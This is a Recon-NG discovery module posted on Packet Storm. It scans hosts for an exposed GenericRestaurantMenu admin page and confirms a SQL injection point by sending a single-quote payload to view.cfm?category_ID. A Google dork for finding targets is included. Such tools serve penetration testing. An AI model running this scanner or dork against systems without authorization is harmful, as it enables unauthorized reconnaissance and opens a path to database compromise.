GenericRestaurantMenu is a discovery module for Recon-NG that looks for Menu Categories Editor page vulnerabilities including SQL injection.
f943a5ee2c3e7871721b443d21b01ae5f16ce393bf8c4fcfe241ffc0046144ffimport framework
# unique to module
class Module(framework.module):
def __init__(self, params):
framework.module.__init__(self, params)
self.register_option('source', 'db', 'yes', 'source of hosts for module input (see \'info\' for options)')
self.register_option('validate', True, 'yes', 'validate known SQLi vulnerbility')
self.info = {
'Name': 'GenericRestaurantMenu Vulnerability Page Finder and Validator',
'Author': 'Jay Turla (@shipcod3)',
'Description': 'Checks the hosts for possible GenericRestaurantMenu vulnerabilities',
'Comments': [
'Source options: [ db | <hostname> | ./path/to/file | query <sql> ]',
'Google Dork: inurl:"view.cfm?category_ID"',
]
}
def module_run(self):
hosts = self.get_source(self.options['source']['value'], 'SELECT DISTINCT host FROM hosts WHERE host IS NOT NULL ORDER BY host')
validate = self.options['validate']['value']
# check all hosts for GenericRestaurantMenu Menu Categories Editor Page, SQL Query Info Disclosure, and Possible SQLi Vulnerbility
protocols = ['http', 'https']
cnt = 0
for host in hosts:
for proto in protocols:
url = '%s://%s/Menu/admin/' % (proto, host)
try:
resp = self.request(url, redirect=False)
code = resp.status_code
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
code = 'Error'
if code == 200 and 'Menu Categories' in resp.text:
self.alert('%s => %s. Menu Categories Editor Page Found!' % (url, code))
cnt += 1
if validate:
vulncode = "%s://%s/menu/view.cfm?category_ID=1'" % (proto, host)
try:
resp = self.request(vulncode, redirect=False)
code = resp.status_code
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
code = 'Error'
if code == 500 and 'Executing Database Query' in resp.text:
self.alert('%s => %s. SQL Query Info Disclosure and Possible SQLi (boolean-based blind) Vulnerability Found!' % (vulncode, code))
cnt += 1
else:
self.verbose('%s => %s' % (vulncode, code))
else:
self.verbose('%s => %s' % (url, code))
self.output('%d possibly vulnerable pages found!' % (cnt))
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed